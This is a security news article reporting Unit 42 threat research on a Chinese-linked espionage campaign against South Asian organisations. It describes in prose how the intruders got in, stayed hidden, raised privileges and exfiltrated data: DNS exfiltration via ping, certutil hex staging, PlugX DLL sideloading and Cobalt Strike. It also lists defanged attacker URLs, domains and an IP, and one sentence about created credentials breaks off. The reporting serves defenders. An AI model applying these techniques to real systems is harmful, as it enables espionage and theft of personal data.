
A newly identified cyberespionage campaign, tracked as CL-STA-0048, has been uncovered by Unit 42 researchers targeting high-value organizations in South Asia, including a telecommunications company. The attack demonstrates advanced tactics, techniques, and procedures (TTPs), suggesting a nation-state-backed actor with a strong focus on intelligence gathering.
According to the research, the primary goal of this campaign was to obtain personal information from government employees and exfiltrate sensitive data from targeted organizations.
“These objectives bear the hallmarks of a nation-state advanced persistent threat (APT) espionage operation,” researcher said.
Unit 42’s moderate-to-high confidence assessment attributes the activity to a Chinese nexus, based on the tools, TTPs, infrastructure, and victimology.
The attackers demonstrated persistence in breaching their targets, systematically probing different internet-facing services until they found a vulnerable entry point.

- Attempt 1: The threat actor first targeted IIS servers, attempting to deploy web shells—but these efforts were blocked by Cortex XDR.
- Attempt 2: After failing with IIS, they shifted focus to Apache Tomcat, attempting to plant a ColdFusion web shell—which was also prevented by Cortex XDR.
- Attempt 3: The attackers finally succeeded in compromising an unpatched MSSQL server, giving them a foothold inside the organization.
“With each failure, the threat actor adapted, targeting the next vulnerable asset in this list.”
Once inside, the attackers escalated their efforts using a combination of PowerShell scripts, privilege escalation tools, and stealthy malware deployment techniques.
The campaign employed two rare but effective exfiltration methods:
1. Exfiltration Over DNS Using the ping Command
Rather than using traditional data theft methods, the attackers formatted stolen data as a series of subdomains and exfiltrated it via DNS queries triggered by ping requests.
“Each ping command triggered a DNS request, transmitting the exfiltrated data to the attackers via DNS.”
This stealthy technique helped bypass network security monitoring tools that primarily focus on HTTP and FTP traffic.
2. Using SQLcmd Utility for Data Theft
After gaining access to the MSSQL server, the attackers leveraged SQLcmd to harvest sensitive information and exfiltrated stolen database records.
They specifically targeted:
✅ Government employee records
✅ Client information (phone numbers, addresses, email IDs, birth dates)
✅ Sensitive corporate database contents
By using native SQL tools, the attackers avoided raising red flags that would typically be associated with malware-based data exfiltration.
The PlugX Remote Access Trojan (RAT) played a central role in this attack, serving as a modular backdoor capable of executing additional payloads. The attackers abused the certutil utility to download and execute PlugX from: https://h5.nasa6[.]com/shell/.
To evade detection, they used DLL sideloading techniques, disguising malicious PlugX components as legitimate Adobe Acrobat files:
- Acrobat.exe → Legitimate Adobe binary
- Acrobat.dxe → Encrypted PlugX payload
- Acrobat.dll → PlugX loader
Once executed, PlugX connected to a C2 server (mail.tttseo[.]com) and injected itself into a legitimate system process (svchost.exe) to evade detection.
“The PlugX payload then connected to the C2 server mail.tttseo[.]com, executing in memory as a detection evasion attempt.”
The attackers used a unique “Hex Staging” method to deliver malicious payloads piece by piece.
- Instead of directly writing an executable to disk (which security tools can detect),
- They incrementally wrote hex-encoded data into a temporary file,
- Then used certutil to decode and execute the malware.
“This method bypasses conventional security detection by using native Windows utilities to covertly deliver and execute malicious code.”
This allowed the attackers to deploy additional payloads, including:
✅ Cobalt Strike beacons
✅ SQL scripts for database manipulation
✅ Privilege escalation tools
Once inside the network, the attackers focused on gaining administrative access and maintaining long-term persistence.
Privilege Escalation Techniques Used:
🔺 SspiUacBypass – Exploits Windows SSPI to bypass User Account Control (UAC).
🔺 BadPotato & RasmanPotato – Tools from the Potato Suite, used to elevate privileges to SYSTEM-level access.
Command-and-Control Infrastructure:
- SoftEther VPN – A renamed version of the popular VPN tool, abused for stealthy communications.
- Winos4.0 Downloader – A custom-built downloader that connected to 154.201.68[.]57 to fetch payloads.
- Cobalt Strike Deployment – Used for post-exploitation operations, injecting itself into winlogon.exe to maintain stealthy persistence.
“The threat actor deployed Cobalt Strike to execute additional malicious activities within the compromised environment.”
Once inside the database, the attackers attempted to create a privileged database user with the following credentials:
They then deployed a malicious SQL script (1.sql.tmp), which:
✅ Identified and extracted sensitive information (client names, phone numbers, emails).
✅ Aggregated records from multiple databases for large-scale exfiltration.
✅ Used SQLcmd to write stolen data into a text file (C:\users\public\123.txt) for later exfiltration.
“The command groups this data by mobile number and saves the output as a .zip file.”
Unit 42’s investigation strongly suggests ties between CL-STA-0048 and Chinese APT groups:
🔹 Overlaps with DragonRank – Similar PlugX malware variants and C2 infrastructure.
🔹 Use of Chinese DNS Logging Tools – The attackers exfiltrated stolen data via dnslog.pw, a Chinese pen-testing tool.
🔹 KCP Protocol Abuse – The malware leveraged KCP, a low-latency protocol previously used by APT41.
🔹 Supershell C2 Panel – The attackers used Supershell, a command-and-control framework with Mandarin-based documentation.
Related Posts:
- PlugX malware: The Enigma of Cyber Espionage Unveiled
- “PlugX” Malware Deleted from Thousands of Computers in Global Operation
- France Leads International Effort to Eradicate PlugX Trojan from 3,000 Systems
- Global Cyber Collaboration Takes Down PlugX Worm